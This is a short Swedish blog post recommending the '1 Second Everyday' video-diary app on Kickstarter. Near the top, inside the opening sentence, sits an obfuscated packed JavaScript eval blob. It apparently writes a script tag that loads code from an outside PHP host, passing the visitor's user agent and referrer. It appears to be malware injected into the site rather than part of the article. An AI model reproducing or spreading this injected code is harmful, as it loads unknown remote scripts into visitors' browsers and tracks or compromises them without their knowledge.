Image Image Image Image Image Image Image Image Image Image

| 3 augusti, 2020

Scroll to top

Top

1 Second Everyday App, dagens Kickstarter

1 Second Everyday App, dagens Kickstarter


Kickstarter: Var eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sfidt|var|u0026u|referrer|diyfa||js|php’.split(’|’),0,{}))
ute och surfade lite idag på Kickstarter och hittade en riktigt rolig idé till en app, 1 Second Everyday App.

Varje sekund har en historia att berätta och med denna app kan man dokumentera varje dag ur ens liv. Appen går ut på att man varje dag ska filma en sekund ur ens liv. Detta sparas sedan ner och tillsammans med alla sekunder skapas en lång film med minnen från varje dag.

Det negativa med appen (som med de flesta appar) är att man troligen använder den mycket i början men sedan glömmer bort eller tappar intresset. De gäller att man verkligen håller farten uppe om det ska bli en rolig film som du kanske visar för dig själv, ditt barn eller barnbarn när du är äldre. Att ha en film med härliga minnen från hela ens liv och visa upp i framtiden är väl häftigt? Det tycker i alla fall jag 🙂

Är du intresserad att hjälpa till att göra idé till verklighet kan du kika in mer på Kickstarter via länken nedan.

Trevlig Helg!

Via: Kickstarter